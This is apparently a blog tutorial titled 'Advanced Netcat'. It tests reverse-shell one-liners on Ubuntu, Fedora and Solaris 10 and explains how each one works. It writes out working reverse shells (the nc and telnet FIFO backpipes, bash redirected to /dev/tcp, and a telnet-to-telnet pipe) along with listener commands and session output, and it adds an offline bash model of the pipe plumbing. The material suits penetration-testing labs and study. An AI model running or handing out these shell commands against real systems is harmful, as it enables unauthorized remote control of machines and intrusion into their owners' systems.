Advanced Netcat

I wanted to build a post around -> http://lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/

That post has quite a few little tricks for getting a shell with nothing but built-in tools. I wanted to try them against several Linux distributions (plus Solaris 10, for contrast) to check that they all behave the same way. In every example the listener runs on the Kali client at 10.0.0.1 and the shell is pushed back from the target at 10.0.0.2.

Example 1 (mknod backpipe)

Client (Kali 1.0.6 x64 VM):
  1. client@client:~$ nc -lvvp 8888
  3. Connection from 10.0.0.2 port 8888 [tcp/*] accepted
     whoami
     target

Targets Ubuntu 12.04.4 LTS Server and Fedora 20 x64 (same command on both):
  2. target@target:~$ mknod backpipe p && nc 10.0.0.1 8888 0<backpipe | /bin/bash 1>backpipe

Target Solaris 10 x86: fails, Solaris doesn't have nc by default.

How it works: mknod backpipe p (or mkfifo backpipe) creates a named pipe. nc's stdout carries the commands down the ordinary pipe into bash, and bash's stdout is redirected into the FIFO, which nc reads as its stdin and sends back over the socket. Only stdout goes back; bash's error messages stay on the target's terminal unless you add 2>&1 after /bin/bash. The FIFO is left on disk when you are done, so remove it.

Example 2 (/dev/tcp sockets)

Client (Kali 1.0.6 x64 VM):
  1. client@client:~$ nc -lvv 8888
  3. Connection from 10.0.0.2 port 8888 [tcp/*] accepted
     target@target:~$ whoami
     whoami
     target

Targets Ubuntu 12.04.4 LTS Server and Fedora 20 x64 (same command on both):
  2. target@target:~$ /bin/bash -i > /dev/tcp/10.0.0.1/8888 0<&1 2>&1

Target Solaris 10 x86: fails with
  /dev/tcp/10.0.0.1/8888: cannot create

Notes: /dev/tcp/HOST/PORT is not a real file. It is a bash extension (net redirections), and the redirection is performed by the shell you type the command into, not by the /bin/bash being started. Order matters: > opens the socket on stdout first, then 0<&1 and 2>&1 copy that socket onto stdin and stderr. Because of -i, the prompt and the echoed command come back along with the output. "cannot create" is the Bourne/Korn shell's redirection error, which suggests the Solaris 10 default sh was doing the redirection and has no such feature; wrapping the whole command in bash -c '...' would only help if the target's bash was built with net redirections. The listener here drops -p; that is fine with netcat-openbsd, while netcat-traditional needs nc -lvvp 8888 as in Example 1.

 

Example 3 (mknod + telnet)

Client (Kali 1.0.6 x64 VM):
  1. client@client:~$ nc -lvv 8888
  3. Connection from 10.0.0.2 port 8888 [tcp/*] accepted
     whoami
     target

Targets Ubuntu 12.04.4 LTS Server and Fedora 20 x64 (same command and same output on both):
  2. target@target:~$ mknod backpipe p && telnet 10.0.0.1 8888 0<backpipe | /bin/bash 1>backpipe
     /bin/bash: line 1: Trying: command not found
     /bin/bash: line 2: Connected: command not found
     /bin/bash: line 3: Escape: command not found

Target Solaris 10 x86: fails with
  bash: telnet: command not found…

Notes: same plumbing as Example 1 with telnet in place of nc. The three "command not found" lines are harmless: telnet prints its connection chatter ("Trying 10.0.0.1...", "Connected to 10.0.0.1.", "Escape character is '^]'.") on stdout, so it flows down the pipe into bash, which tries to run each line as a command. Those errors go to bash's stderr, i.e. the target's terminal, and the shell works normally afterwards, as the whoami on the listener shows.
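The following is an added example, not code from this post or from lanmaster53's, that reproduces the backpipe plumbing of Examples 1 and 3 offline. The network client (nc or telnet) is replaced by two stand-in functions I wrote for this purpose, fake_nc and fake_telnet, and the operator's commands are constructed sample input. fake_telnet also emits the connection chatter that real telnet prints on stdout, so you can see where the three "command not found" lines in Example 3 come from and confirm that the shell keeps working behind them while those errors never reach the operator.

```bash
#!/usr/bin/env bash
# Added example: the FIFO ("backpipe") plumbing of Examples 1 and 3 with the
# network client replaced by local stand-ins (fake_nc, fake_telnet), so it
# runs offline.  Data flow is identical to
#     nc HOST PORT 0<backpipe | /bin/bash 1>backpipe
#   client stdout --(pipe)--> bash stdin    : commands travel this way
#   bash stdout   --(FIFO)--> client stdin  : output travels back this way

# Constructed sample input: what the operator types on the listener.
OPERATOR_INPUT='echo hello
id -un
'

# Stand-in for nc: send the operator's input down the pipe, read the two
# reply lines that come back through the FIFO, report them on fd 3, hang up.
fake_nc() {
    printf '%s' "$OPERATOR_INPUT"
    IFS= read -r reply1
    IFS= read -r reply2
    printf '%s|%s\n' "$reply1" "$reply2" >&3
}

# Stand-in for telnet: same, but first print the connection chatter that real
# telnet writes to STDOUT.  Because stdout is the pipe into bash, bash gets
# these lines as "commands" (hence Example 3's "Trying: command not found").
fake_telnet() {
    printf 'Trying 10.0.0.1...\n'
    printf 'Connected to 10.0.0.1.\n'
    printf "Escape character is '^]'.\n"
    fake_nc
}

# run_backpipe CLIENT ERRFILE: wire  CLIENT 0<backpipe | bash 1>backpipe
# with a fresh FIFO (mkfifo is the same as mknod ... p).  bash's stderr goes
# to ERRFILE; it never reaches the operator because only stdout enters the FIFO.
run_backpipe() {
    local dir
    dir=$(mktemp -d) || return 1
    mkfifo "$dir/backpipe"
    { "$1" 0<"$dir/backpipe" | bash 1>"$dir/backpipe" 2>"$2"; } 3>&1
    rm -rf "$dir"
}

# What the operator sees: "hello|<user>" with either client.
shell_output() {
    run_backpipe "$1" /dev/null
}

# How many "command not found" errors bash raised on the target side:
# 0 with fake_nc, 3 with fake_telnet (one per chatter line).
stray_errors() {
    local errfile
    errfile=$(mktemp) || return 1
    run_backpipe "$1" "$errfile" >/dev/null
    grep -c 'command not found' "$errfile" || :
    rm -f "$errfile"
}

# Stand-alone usage.
echo "nc-style output:       $(shell_output fake_nc)"
echo "telnet-style output:   $(shell_output fake_telnet)"
echo "stray errors (nc):     $(stray_errors fake_nc)"
echo "stray errors (telnet): $(stray_errors fake_telnet)"
```

The FIFO rendezvous is the same as in the real command: the client's 0<backpipe blocks until bash opens the FIFO for writing, and both opens happen concurrently because they are elements of one pipeline. The stand-ins never touch the network, so this is only a model of the plumbing, not of nc or telnet themselves.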
 

 

Example 4 (telnet to telnet)

Client (Kali 1.0.6 x64 VM):
  1. client@client:~$ nc -lvv 8888
  2. client@client:~$ nc -lvv 4444
  4. Connection from 10.0.0.2 port 8888 [tcp/*] accepted
     whoami
  5. (from the 4444 listener)
     target

Targets Ubuntu 12.04.4 LTS Server and Fedora (version not noted) (same command on both):
  3. target@target:~$ telnet 10.0.0.1 8888 | /bin/bash | telnet 10.0.0.1 4444

Target Solaris 10 x86: fails with
  bash: telnet: command not found…

Notes: no FIFO is needed here. Commands arrive over the connection to 8888 and output leaves over a second connection to 4444, so you type on one listener and read on the other. As in Examples 1 and 3, only stdout crosses; add 2>&1 after /bin/bash if you want errors to show up on the 4444 side.